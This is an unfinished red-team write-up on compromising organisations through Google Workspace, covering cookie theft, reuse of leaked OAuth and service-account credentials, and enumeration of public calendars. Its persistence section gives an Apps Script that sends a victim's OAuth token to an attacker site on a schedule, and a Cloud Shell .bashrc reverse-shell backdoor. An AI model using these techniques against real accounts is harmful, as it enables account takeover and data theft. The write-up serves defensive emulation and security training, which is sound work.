*This is a work in progress! We started writing it in early 2021, but priorities shifted to other things. We are making it public and may continue to work on it in the future. It should probably be broken up into multiple parts, as it will be much too long as it's currently structured.*

[[_TOC_]]


# Overview

A traditional red team engagement may start with an implant installed on a single machine and lead to the complete compromise of an organization by abusing trusts in a corporate network's Active Directory. But what if there is no Active Directory, or even no corporate network at all?

Faster than ever, companies around the globe are moving to cloud services and partially, or even fully, remote workforces. In these modern environments, adversaries will use new methods to gain access to critical data. As defenders of these environments, it is important for us to understand those methods and to be able to emulate them to proactively test our defense and detection capabilities.

This writeup will cover techniques to infiltrate, compromise, and control organizations using a combination of three popular cloud services - Google Workspace (formerly G-Suite), Slack, and Zoom. This is a realistic combination that covers email, document management, chat, video conferencing, and more.

First, we will map out a threat model that looks at the exposed attack surface and the various trust boundaries that exist when using these services together. 

Next, we'll do a crash-course on how each service works before exploring opportunities to abuse common configurations. We'll follow a subset of the MITRE ATT&CK framework's tactics including initial access, persistence, discovery, lateral movement, collection, and exfiltration.

Finally, we will discuss ways in which we can leverage any access gained in one service to begin our compromise of another. We'll do this in multiple directions, to ensure that any initial access can get us to our goal of total resource ownership.

We hope that describing these techniques in detail will better prepare you to defend your own environments.

Happy hacking!

# Threat Model

Developing a [threat model](https://en.wikipedia.org/wiki/Threat_model) is helpful when trying to visualize a complex interconnected system. For starters, it allows us to understand where exactly an organization's assets reside and how they are meant to be legitimately accessed. As an attacker, we can then drill down into the various connection-points of the system and attempt to find weakness or flaws that allow us to do things we are not meant to do.

The beauty of having a threat model, as an attacker, is that we can hopefully avoid falling down rabbit holes that do not further our objectives. For example, perhaps we are attempting to gain access to a sensitive document stored in Google Drive. We may begin by scanning public git repositories, using fairly generic regular expressions to look for leaked API keys. If our scans uncover a long list of possible keys, we can focus ONLY on those that might provide access to systems outlined in our threat model.

For this write-up, we'll create a visualization that would be the starting point of an asset-based threat model. The image below shows our three target systems and the most common ways they can be accessed. The colorful borders are used to demonstrate "trust boundaries" which demonstrate who can leverage that particular access method. It will also show some of the common ways that the systems interact with each other, demonstrating opportunities to leverage trust from one environment to "move laterally" into another.

![threat model graphic](threat-model.jpg)

The drawing allows us to make some interesting conclusions. It's probably obvious to us that compromising the workstation of a human administrator would give us a lot of access to our target systems. But drilling down to something more specific, like the dev/test code for a Slackbot that is being worked on by that administrator, might be a much easier target and would still provide us a working path into the environment.

The same could be said for a human end-user. Again, compromising their entire workstation would do the trick. But perhaps they have already delegated Google Workspace access to a specific web browser plugin, and that might be the most likely entry point for a malicious actor.

Finally, it's painfully obvious that non-human entities (APIs, custom automation, third-party add-ons) appear to introduce many potential access points. These vary by organization and are often either invisible to the end user, or so visible that they are just automatically trusted/ignored (ie slackbots, automatic emails, etc).

If you were threat modeling this in your own organization, you'd probably drill further down into your actual assets contained in each system. For example, you have a restricted folder in Google Drive for HR data, a Slack room with security notifications, a recurring Zoom meeting for investors, etc.

# Preface - Identity Providers

Many organizations use a cloud-based [identity provider](https://en.wikipedia.org/wiki/Identity_provider) to provide a single authentication gateway to all of their systems. This would include products like Okta and OneLogin. It's safe to assume that an attacker who can authenticate to a trusted identity provider could then access any managed application in the context of their current session.

Attacking a third-party identity provider would make for an interesting write-up on its own, but it will not be added as a dedicated layer to this one, simply to avoid the additional complexity and repitition it would add.

Google actually provides [its own identity service](https://cloud.google.com/identity), which we will touch on in the various techniques below. What might be interesting to you is that "Sign on with Google" will likely work even in environments that are attempting to centrally manage authentication via something like Okta. The reason for this is that the third-party service (like Slack) is simply trying to match authentication attempts to the registered email address. Let's say an administrator has added Slack as a SAML application in their Okta portal. That user could simply go to https://slack.com/signin and click "Sign on with Google". Because their Slack account is tied to the same email address as their Google Workspace identity, it will work and they are essentially bypassing the requirement to use Okta to login.


# Google Workspace

[Google Workspace](https://workspace.google.com/) is a collection of productivity/collaboration applications, directory services, security/administration tools, endpoint management, and eDiscovery. It can replace many of the systems and applications that would traditionally be installed in a corporate network - like Microsft Office, Exchange, and Active Directory. As someone who used to deploy and manage those traditional systems, I'm really quite impressed with what Google has managed to make available via the web browser, instantly available and requiring very little technical knowledge to begin building the foundation of a distributed workforce.

The hiearchy of Workspace will seem familiar if you have experience with a more traditional directory service (like AD). At the very top you have a [single organizational unit (OU)](https://support.google.com/a/answer/4352075?hl=en) where all of your resources (users and devices) initially reside. A resource can belong to only a single OU. You can create additional OUs below the initial one, nesting them as you see fit. Child OUs will inherit these policies from their parents unless that same policy is also defined on the child itself - at this point, the child's policy is effective.

In addition to OUs, Workspace allows you to create [access groups](https://support.google.com/a/answer/9050643). A user may reside in a single OU and simutenously be assigned multiple access groups. Access groups are used **only** to **enable** access to specific services. For example, user Alice may reside in the *Accounting* OU which does not permit access to managing DNS entries via Google Domains. Instead of modifying the organizational hiearchy of a single accounting user, an access group called *DNS Admins* could be created, granted permission to this service, and assigned to Alice.

Administrative access to Workspace itself can be granted via roles to human users and service accounts. Roles contain permissions that are specific to either the web UI or the admin API. Google provides a set of pre-defined administrative roles, but custom roles can be created as well. The permissions themselves are fairly granular, with all sorts of interesting capabilities that should be enumerated during the *Discovery* phase outlined below. The pre-defined role `Super Admin` can do everything - both via the web and via the admin API. Other roles, like `Help Desk Admin`, are designed specifically to help with resetting passwords. By default, new users do not have any predefined administrative roles assigned.

Google offers three types of applications in Workspace:

- Core (GMail, Calendar, Drive, Meet, etc - 14x apps at time of writing this)
- Additional Services (Blogging, photos, video, etc - 56x apps at time of writing this)
- Marketplace (third-party apps - many, many exist)

All "Core" apps are enabled for all users by default. Most "Additional Services" apps are also enabled for all users by default. All users are allowed to install any "Marketplace" app in a default configuration, but administrators can either block all apps or allow only specifc apps via an allow-list.

From an authentication perspective, there are three types of "users". The first are human beings - typically the employees of an organization. They log in to Workspace one of the following ways:

- With a username and password via a URL like https://gmail.com or https://admin.google.com
    - This may be managed centrally via Google Workspace or synchronized from a corporate LDAP server via [Google Cloud Directory Sync](https://support.google.com/a/answer/106368?hl=en)
- Via a third-party Single-Sign-On identity provider, like Okta
- Via a mobile application that caches session and refresh tokens

The next type of user is an application, like a local mail client or a hosted service available in [Google Workspace Marketplace](https://gsuite.google.com/marketplace). Applications will need to access various APIs (called services) in order to get things done. For example, that local mail client would likely need Gmail, Contacts, and Calendar to function. Some applications may need access to the service called Google Workspace Admin, which is essentially the admin SDK. This would allow the app to manage user and organization settings with the same level of access as the user who authorizes the app for usage. By default, ALL of these APIs are set to "unrestricted", which means that any user can authorize any apps. Services can be individually set to "restricted" by an administrator, which would permit only a defined list of trusted apps to access them.

Finally, there is an option to allow service accounts from Google Cloud Platform to programatically interact with the admin SDK APIs. The account can be authorized to access users' data without their explicit knowledge or consent. This process is called [domain-wide delegation of authority](https://support.google.com/a/answer/162106?hl=en). This is an interesting attack vector and is also covered in [here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-tech-notes/-/tree/master/gcp-post-exploitation-feb-2020#spreading-to-g-suite-via-domain-wide-delegation-of-authority) in my previous write-up on GCP post exploitation.

## Initial access

We're going to use a fairly broad definition of "initial access" here. Some of the techniques below demonstrate gaining full interactive access to Google accounts, while others focus more on discovering publicly-shared resources. Depending on the specifics, either scenario could be the more impactful one. For example, a single shared spreadsheet with credentials for the payroll system could be a lot more damaging than access to the GMail inbox of a low-privileged contractor.

### Cookie theft

This technique assumes you're already far along in the post-exploit tactics of some other chain. Maybe you have a shell on a workstation, a MiTM with TLS inspection, or you have managed to trick your target into installing a malicious browser extension. As long as you can extract the relevant cookies, you can simply put them into your own browser and assume the identity of that user. A sudden change in source IP address, user agent, or browser fingerprint does not seem to trigger any sort of re-authentication requirements from Google.

While this technique has an obviously high barrier to entry, it is very effective as it completely bypasses additional protections like multi-factor authentication, external SSO requirements, SAML, etc. You get the cookies, you get the account. As an added bonus, a stolen session will not appear in Google's "*Where you're signed in*" list (https://myaccount.google.com/device-activity). This list seems to include only devices that completed a convential logon, not those that re-use already active session cookies.

Each Workspace application has its own subdomain (drive.google.com, mail.google.com, calendar.google.com, etc). An active session on any of these contains a large list of cookies, some scoped specifically to the subdomain itself, some to `accounts.google.com` and some to the parent domain `.google.com`. These are all session cookies, meaning they are stored in memory by the web browser and not on disk in the user profile. This means that they need to be extracted from the browser itself, from system memory, or over the wire.

To steal a session, it is sufficient to clone the session cookies scoped to `accounts.google.com` and `.google.com`. Then, simply browse to https://myaccount.google.com and select the application of your choice.

References:
- MITRE ATT&CK: [Steal web session cookie](https://attack.mitre.org/techniques/T1539/)
- MITRE ATT&CK: [Use Alternate Authentication Material: Web Session Cookie](https://attack.mitre.org/techniques/T1550/004/)
- Metasploit: [post/firefox/gather/cookies](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/firefox/gather/cookies.rb)
- Metasploit: [post/multi/gather/chrome_cookies](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/gather/chrome_cookies.rb)

### Leaked credential data

Obviously, an actual clear-text username/password combination for a Google account would be quite useful in gaining initial access. But there are other forms of credentials that you are more likely to encounter, and which will also provide varying levels of access. These are described below.

#### App Passwords

Some users may prefer to access Google services via applications that do not support "Sign in with Google" and/or two-factor authentication. Mail, Calendar, Contacts, and YouTube all support [App Passwords](https://support.google.com/accounts/answer/185833?hl=en) to make this possible. These passwords can be created by any user on a per-app basis and are always 16 characters long consisting of only the letters a-z.

As a bonus, an app password bypasses the two-factor authentication requirement.

You may find one of these passwords in the configuration files for a desktop/mobile application, backup files, or a user's notes. If you do, you can plug it in to your favorite mail client and test what services you can access. For the username, use the user's full email address.

#### API-compatible credential data

Google has a ton of API endpoints that can be used to programatically access resources. Their [API Explorer](https://developers.google.com/apis-explorer/) is a really nice resource to explore them all. My favorite feature of the explorer is its ability to dynamically build curl commands for you - this is incredibly helpful when you are trying to manually use any access tokens you have discovered.

Generally speaking, these endpoints are [accessed by applications](https://developers.google.com/identity/protocols/oauth2) using official [client libraries](https://developers.google.com/api-client-library/) to handle authentication. Applications each have their own "client ID" which they use in combination with a "client secret" to uniquely identify themselves to Google. If an organization is deploying an application in their own environment, they will have configured the allowed "scopes" for a given client ID - this determines which API endpoints that application is allowed to talk to.

Ultimately, the application will need to include a valid short-lived OAuth token with each API request. We are most interested in applications that can perform administrative tasks inside Google Workspace and/or access user data. In order for these types of applications to obtain an OAuth token, they must request permission from a legitimate user to act on their behalf.

You've probably seen this process yourself if you've ever connected a web app to your own Google account. It looks something like this:

![SCREENSHOT NEEDED](screenshot.jpg)

Once a user agrees, the application will receive a short-lived OAuth token which it can use to act as that user. The application also receives a refresh token, which it can use to obtain new short-lived OAuth tokens as needed.

A popular example of this is [GAM](https://github.com/jay0lee/GAM), a command-line tool for administering Workspace. GAM does a bit of hand-holding using a setup function, which does things like create a new client ID and authorize it to access common administrative APIs. It caches several types of credential data on the machine it runs from, which makes it a great example for this tutorial.

Let's walk through each credential type and what you can do with them. We'll use GAM as a specific example of what the data looks like and where you could find it. GAM is often installed on a workstation and used by a single user. However, the concepts described here would also apply to server-side applications, which may cache credential data for multiple users.

You should look for this type of data in source code repositories, CI job configurations and logs, backup archives, decompiled mobile applications, and local filesystems for compromised workstations. You might also obtain these items via a web application vulnerability, like arbitrary local file reads or SQL injections.

##### OAuth Client ID & Secret

On a workstation that has installed and configured GAM, this data is stored at `~/.gam/client_secrets.json`. It looks something like this:

```
{
    "installed": {
        "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
        "auth_uri": "https://accounts.google.com/o/oauth2/v2/auth",
        "client_id": "[REDACTED].apps.googleusercontent.com",
        "client_secret": "[REDACTED]",
        "created_by": "[REDACTED]",
        "project_id": "[REDACTED]",
        "redirect_uris": ["http://localhost", "urn:ietf:wg:oauth:2.0:oob"],
        "token_uri": "https://oauth2.googleapis.com/token"
    }
}
```

Looks pretty juicy, right? Looks can be deceiving. Remember, the client ID and secret are used merely to identify the application to Google prior to the application requesting authorization from a legitimate user.

If you were to obtain this data and this data only, you could build such a web application. This would give you an incredibly legitimate-looking phishing page that was aleady authorized to impersonate willing users in your target organization. However, this may be difficult to actually implement as you would also need to control the target specified in the `redirect_uris` section above.

Let's move on to more usable credential types, one of which will actually require this ID/secret combo to utilize.

##### Short-lived OAuth token

GAM stores OAuth session data in `~/.gam/oauth2.txt`. The current short-lived OAuth token looks something like this:

```
...
  "token": "ya29.[LONG REDACTED STRING]"
  "token_expiry": "2021-03-16T00:32:12Z",
  "token_uri": "https://oauth2.googleapis.com/token"
...
```

All Google OAuth tokens start with `ya29.`, so this is a good string to look out for when searching for strings. If you find one of these tokens, you can use the following curl command to validate its authenticity/access/expiration/etc.

```
$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token="[TOKEN]"

{
  "issued_to": "[REDACTED]",
  "audience": "[REDACTED].apps.googleusercontent.com",
  "user_id": "[REDACTED]",
  "scope": "[LIST OF PERMITTED API ENDPOINTS",
  "expires_in": 728,
  "email": "[REDACTED]",
  "verified_email": true,
  "access_type": "offline"
}
```

Of particular interest in the data above is the `user_id` (who the token is authenticated as), `scope` (which Google API endpoints are permitted), and `expires_in` (time in seconds until this token expires). Once a token is expired, the curl command above will give a result like this:

```
{
  "error": "invalid_token",
  "error_description": "Invalid Value"
}
```

If you are in a position to obtain or intercept tokens before they expire, you can use them to interact with any of the API endpoints specified in the `scope` section above. As an example, you can get a list of all users in your target domain with the following curl command:

```
DOMAIN=yourtarget.com   # the email domain name of your target
TOKEN=ya29.xxx          # the OAuth token you grabbed
$ curl \
    "https://admin.googleapis.com/admin/directory/v1/users?domain=$DOMAIN" \
    --header "Authorization: Bearer $TOKEN" \
    --header 'Accept: application/json' \
    --compressed
```

##### OAuth refresh token

The tokens described above are known as "short-lived" for a reason - they expire quickly. At the time of writing, it appears that the default is one hour. If you are working with data obtained from a source repository, CI jobs logs, insecure backups, etc - it is likely that any tokens you have discovered will no longer be useful.

But fear not! Most applications will have a mechanism to request new OAuth tokens on demand using something called a "refresh token". It is also quite likely that this refresh token will be stored in the same place you found the temporary token. In the case of GAM, it is stored in the same file (`~/.gam/oauth2.txt`). The relevant portion looks like this:

```
...
"refresh_token": "[REDACTED]",
...
```

If you've discovered one or more refresh tokens, this is where you can put the OAuth client ID and client secret to real use. You need all three of these items to generate a new short-lived token, which can be done with the following curl command:

```
REFRESH_TOKEN=xxx       # The refresh token
CLIENT_ID=xxx           # OAuth client ID
CLIENT_SECRET=xxx       # OAuth client secret
curl -k -X POST \
  "https://www.googleapis.com/oauth2/v4/token" \
  --data client_id=$CLIENT_ID \
  --data client_secret=$CLIENT_SECRET \
  --data refresh_token=$REFRESH_TOKEN \
  --data grant_type=refresh_token
```

A new token should be returned, with the scopes that are assigned to this specific OAuth client ID inside your target's environment. You can use this token as described above.

##### GCP service account key file

GAM does something interesting, above and beyond the basic requirement for an OAuth-compatible application. It creates a Google Cloud Platform (GCP) service account, generates a private key file for the account, and caches it locally. If the legitimate GAM user attempts to run commands involving user impersonation, the tool will walk them through enabling a feature called [domain-wide delegation](https://developers.google.com/admin-sdk/reports/v1/guides/delegation) on that service account.

The service account key file does not expire, and can be used to impersonate ANY user in the organization (including administrators).

GAM stores this file at `~/.gam/oauth2service.json`. It looks something like this:

```
{
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "client_email": "[REDACTED]",
  "client_id": "[REDACTED]",
  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/[REDACTED]",
  "private_key": "-----BEGIN PRIVATE KEY-----\n[REDACTED]\n-----END PRIVATE KEY-----\n",
  "private_key_id": "[REDACTED]",
  "project_id": "[REDACTED]",
  "token_uri": "https://oauth2.googleapis.com/token",
  "type": "service_account"
}
```

These key files are always worth hunting for, particularly in the event that they are authorized to access Google Workspace via the domain-wide delegation option.

We've covered how to leverage these keys to create a new administrative user in a previous blog on GCP post-exploitation [here](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#spreading-to-g-suite-via-domain-wide-delegation-of-authority).

```
# Google dorks

# Regular expressions
[a-z]{16}       # app passwords
```

References:
- MITRE ATT&CK: [Valid accounts - cloud accounts](https://attack.mitre.org/techniques/T1078/004/)
- MITRE ATT&CK: [Steal application access token](https://attack.mitre.org/techniques/T1528/)
- MITRE ATT&CK: [Use Alternate Authentication Material: Application Access Token](https://attack.mitre.org/techniques/T1550/001/)

### Publicly-exposed resources

#### Google Directory

The directory is the heart of Google Workspace. It is a listing of all the users in the organization, which includes data like email address, full name, phone number, job title, etc. Organization administrators can also add custom fields which might contain more sensitive information.

Information is power, and a seasoned attacker will spend quality time in the early stages of an attack to learn as much as they can about their target. A list of valid names and email addresses is the starting point for many attacks against Workspace.

Workspace administrators have two options when configuring "External Directory sharing":

- Public data and authenticated user basic profile fields
- Domain and public data (default)

That default setting allows external applications and APIs to access ALL information stored in the directory. However, those applications must first be granted access to the directory. So there isn't an easy way for an organization's entire directory to be accidentally shared with the public.

However, note there is no option that excludes "public data" - this means that there is a small amount of data shared publicly by default, with nothing the organization can do to prevent it.

You've probably already seen this public data in action, such as names and photos of users on Google Groups, Maps, and GMail messages. You can also query this public data programatically, using the [People API](https://developers.google.com/people/api/rest/v1/people/get).

Beyond the official API, you may stumble across various other endpoints to query this information if you keep a close eye on an intercepting proxy (like Burp Suite) while browsing Google sites. One such example of this was previously transformed into [an nmap NSE script here by Paulino Calderon](https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/google-people-enum.nse).

If you are simply looking to create a list of target user accounts that are valid in a particular Google Workspace organization, you can leverage the Metasploit module we created for this purpose, and which requires no authentication. It will brute-force a list of potential usernames and add all valid accounts to the credential store. There are many ways to generate the input list for brute-forcing, such as [linkedin2username](https://github.com/initstring/linkedin2username).

References:
- MITRE ATT&CK: [Gather Victim Identity Information: Email Addresses](https://attack.mitre.org/techniques/T1589/002/)
- MITRE ATT&CK: [Gather Victim Identity Information: Employee Names](https://attack.mitre.org/techniques/T1589/003/)
- Metasploit module: [Google Account Enumeration](http://gitlab.com/TBA)

#### Google Calendar

##### Calendar security overview

Calendar is one of the core Workspace services and is enabled by default for all users of an organization. Each user is automatically assigned their own calendar which Google refers to as a "primary calendar". There are a couple of types of "secondary calendars" as well:

- Group calenders, which can be created by anyone
- Room/Resource calendars, which can be created by administrators

Permissions can be attached at two points - the calendar itself or individual events.

Let's look first at [sharing an entire calendar](https://support.google.com/calendar/answer/37082?hl=en). Access permissions can be assigned to specific people (individuals or groups), everyone in the user's organization, or to the public. For each of those groups, one of the following levels of permission can be selected:

- See only free/busy details
- See all event details (excludes those marked private)
- Make changes to events
- Make changes and manage sharing

Workspace administrators [can limit the level of permissions](https://support.google.com/a/answer/60765#zippy=%2Cyou-can-limit-what-users-share-externally) that users can grant to their primary calendar. By default, this is set to "Only free/busy information". If even a single user in the organization wants to make event a single event public, this setting will need to be changed. This limitation makes it very likely that all users in an organization will be allowed to make both their entire primary calendars public.

There is no administrative option to limit the permissions on group calendars.

For sharing individual calendar events, ["visibility" options](https://support.google.com/calendar/answer/34580?visit_id=637526594225874364-106591360&p=event_visibility&hl=en&rd=1) control who can see the event details and description:

- Default visibility (inherits calendar settings, usually meaning visible only by all members of the organization)
- Public (visible to the world)
- Private (visible only to the calendar owner)

Once someone is added to the guest list, the following additional options are granted based on the event settings:

- Modify event
- Invite others
- See guest list

##### Finding public calendar resources

If a calendar is made public, several types of URLs become automatically available to access that calendar. These range in use case from [embedding onto a website](https://support.google.com/calendar/answer/37083#zippy=%2Cshare-it-with-a-certain-person%2Cembed-your-calendar-on-a-website) to [allowing other Google users to subscribe](https://support.google.com/calendar/answer/37083#zippy=%2Cshare-it-with-a-certain-person) to updates - the former permitting anonymous access and the latter requiring authentication.

Links for primary calendars are easy to figure out, as they include the user's email address. Let's say you are targeting a user with the Google Workspace email address joe@schmoe.local. If their calendar is set to public, the following URLs could be used:

```
# No auth required
https://calendar.google.com/calendar/embed?src=joe%40schmoe.local

# Requires auth, note the base64-encoded email address
https://calendar.google.com/calendar/u/0?cid=am9lQHNjaG1vZS5sb2NhbA
```

Secondary calendars are a bit trickier. They use the same URL formats, but the "email address" is based on a randomly-generated unique identifier that does not include the target organization's name or email domain. Rooms and resource calendars have an address that ends in `resource.calendar.google.com` and groups will end in `group.calendar.google.com`. Try looking for these strings in places like:

- Other public calendars you've discovered
- Website source code
- Google search such as `site:*.target.com site:target.com intext:%40resource.calendar.google.com` and `site:*.target.com site:target.com intext:%group.calendar.google.com`

Once you've discovered some group and resource identifiers, you can check to see if a public calendar is attached by using the same URL format described above (`https://calendar.google.com/calendar/embed?src=[ADDRESS]`.

When using the `embed` type URL above, an HTTP return code of `200` will indicate a calendar that has public sharing enabled. A code of `302` can mean that the calendar does not exist at all or that authorization is required. Browsing to a valid URL will render a graphical calendar where you can switch between layouts to find public events.

Individual events that have been made public (outside the scope of a public calendar) are also difficult to enumerate. One interesting method to find these is to discover a primary calendar that has been made public but with the setting to only show free/busy status. If that user has been added as an attendee to any events that were accidentally marked as "public", the full details will be available in that calendar.

Google also provides a way to embed links to public events. You may have seen this in action on various sites with a button that says something like "add to calendar". You can search a target web site for these event URLs with a Google search like this: `site:*.target.com site:target.com intext:"calendar.google.com/event"`.

Finally, events may have been manually exported or shared via email in the form of an ICS file (`*.ics`). You can search for these in backup locations or compromised workstations.


#### Google Docs
#### Google Sites
#### Google App Scripts

### Phishing

xxx...

## Persistence
Once access is obtained to a Google account, one of the first tasks of an attacker is to try to establish persistence. Indeed, various alerts can be triggered and the access may be revoked or the session terminated. Trying to get persistence is key to maintaining a foothold within the victim environment.
### Google App Scripts
Google [App Scripts](https://developers.google.com/apps-script) is a "cloud-based" scripting language (JavaScript) available to Google users. You can see it as an equivalent of "VBScript/Macros" in the Microsoft world but with a wider scope. A user can indeed create scripts "within" Google documents (Sheet, Doc) that will run when the document opens or when a custom button is pressed (similar to vb macros in MS office) but scripts can also be created "outside" of any documents and can be scheduled to run automatically. Those last ones are the most interesting for persistence (like adding a custom script in a cron job, really useful!)

Having persistence in mind, a classic idea would be to try to create some sort of backdoor or reverse shell but the scripting language does not have extensive networking capabilities (we'll need to dig more into this, there may be ways to acheive this). 

One interesting way found was the regular exfiltration of OAuth tokens to a website controlled by the attacker. As described in the [Oauth section](#short-lived-oauth-token), such a token will give access to resources on behalf of the victim user. 

Google App Scripts support a [getOAuthToken](https://developers.google.com/apps-script/reference/script/script-app#getOAuthToken()) function (_Gets the OAuth 2.0 access token for the effective user_) that is perfectly suited for this kind of persistence. Having access to the victim user session, the attacker can simply go to https://script.google.com and write a script that fetches an OAuth token on behalf of the user and exfiltrates it to a chosen web site such as the following:
```
function main() {
  var token=ScriptApp.getOAuthToken();

  var header = {
    "user-agent": "Mozilla"
  };
  
  var payload = {"token":token};

  var options = {
    'method' : 'post',
    'headers': header,
    'payload' : payload
  };
  response = UrlFetchApp.fetch('https://<attacker-web-site>',options);
}
```
Once written, the attacker can select in the left menu of the App Script web IDE the "Triggers" option and then the "Add Trigger" button at the bottom of the page to create an automatic execution rule of the script. 

The trigger will ask what function to run, at which interval and the script will then be executed regularly according to the trigger, exfiltrating the victim's user OAuth token on a regular basis.
### GCP Cloud Shell
Another well known idea to get persistence within the Google environement is to backdoor the [Cloud Shell](https://cloud.google.com/shell) environement. Anytime the victim user opens Cloud Shell, a connect back may be activated, giving a remote Cloud Shell session under the user identity to the attacker.

Having the initial access, the attacker can perform the backdooring the following way:
- Open a cloudshell session (go to https://console.cloud.google.com/ and select the "Activate Cloud Shell" icon in the top right corner)
- Edit the `.bashrc` file (vim)
- Add a bash connect back command such as: `bash -i >& /dev/tcp/1.1.1.1/80 0>&1 &` (replacing `1.1.1.1` with the attacker's machine IP address and eventually the port number, 80 in this case)
- Have a netcat listener wait on port 80 `nc -nlv 80`
## Discovery
## Lateral Movement
## Collection
## Exfiltration
## Cross-technology lateral movement
    
# Slack

{summary of product and access methods}

## Initial access
## Persistence
## Discovery
## Lateral Movement
## Collection
## Exfiltration
## Cross-technology lateral movement
    
# Zoom

{summary of product and access methods}

## Initial access
## Persistence
## Discovery
## Lateral Movement
## Collection
## Exfiltration
## Cross-technology lateral movement
    
# Third Party stuff
    - Common third-party utilities and integrations
    
# ATT&CK Heatmap???
    - Possibly a simple table, or maybe an interactive heatmap
    
# Sample Attack Narrative
    - Graphic from Vectr
    - Narrative of how an attack might play out
    - Possible video or lab demo? (could be a talk)

# Appendix

## Resources

- Google Workspace online classes:
    - x
    - x
    - x
